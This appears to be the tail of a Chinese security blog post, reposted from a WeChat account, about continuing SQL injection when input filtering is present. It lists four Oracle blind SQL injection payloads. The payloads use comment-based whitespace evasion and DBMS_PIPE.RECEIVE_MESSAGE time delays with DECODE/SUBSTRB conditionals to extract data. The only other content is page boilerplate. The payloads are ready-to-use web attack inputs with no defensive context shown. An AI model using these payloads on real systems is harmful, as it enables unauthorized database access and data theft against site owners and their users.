'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',4)='c
'/**/and/**/(select+decode(substrB(123,1,1),1,dbms_pipe.receive_message('d',5),0)+from+dual)='1
'/**/and/**/(select+decode(substrB(123,1,1),1,1,0)+from+dual)='1
'/**/and/**/(select+decode(substrB(123,1,1),1,1,0)+from+dual)like'1
原文始发于微信公众号(犀利猪安全):一篇水文 | 当注入存在些许过滤,是否就此放弃?
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论